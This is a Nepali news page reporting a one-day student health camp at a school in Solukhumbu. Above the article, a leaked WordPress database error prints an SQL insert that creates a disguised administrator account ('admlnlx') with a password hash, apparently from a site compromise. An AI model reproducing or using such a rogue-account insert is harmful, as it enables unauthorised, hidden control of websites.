WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHxw4ByTz1o71ykY4TQzkyQLKFJSjf0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 10:56:53', '', 'admlnlx', 'admlnlx')

सगरमाथा मावि वाकुमा एक दिने स्वास्थ्य शिविर सम्पन्न – Gaule Khabar

सगरमाथा मावि वाकुमा एक दिने स्वास्थ्य शिविर सम्पन्न

सगरमाथा मावि वाकुमा एक दिने स्वास्थ्य शिविर सम्पन्न

सोलुखुम्बु । माप्य दुधकोशी गााउँपालिका ६ स्थित सगरमाथा मावि वाकुमा एक दिने स्वास्थ्य शिविर सम्पन्न ।

जिल्ला स्वास्थ्य कार्यलय सोलुखुम्बुको संमन्वय र माप्य दुधकोशी गाउँपालिका स्वास्थ्या शाखाको आयोजनामा आज एक दिने स्वास्थ्या शिविर सम्पन्न भएको हो ।

आज सञ्चाल भएको स्वास्थ्य शिविरमा १५१ जना विाद्यार्थीले स्वास्थ्य परिक्षण गरेको माप्य दुधकोशी गाउँपालिका उपाध्यक्ष गौरब राईले जानकारी दिए । केहि दिन देखि यस क्षेत्रमा रुघामार्किले विद्यार्थीहरुलाई ग्रसित बनाएर विद्यालयको पठनपाठन बन्द हुने स्तिथि रहेको उपाध्यक्ष राईले बताए ।

शिविरमा सगारमाथा मावि, पशुपति आवि, चोच्मि आविका विद्यार्थीहरुले स्वास्थ्य परिक्षणमा सहभागिता रहेको नि.प्रशासकीय प्रमुख जितेन्द्र यादबले बताए ।

स्वास्थ्य शिविरमा स्वास्थ्य कर्मिको साथमा गाउँपालिका उपाध्यक्ष गौरब राई

 

स्वास्थ्य शिविरमा विद्यार्थीको साथमा नि. प्रशासकीय प्रमुख जितेन्द्र यादब
स्वास्थ्य शिविरमा सहभागिता विद्यार्थीहरु

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका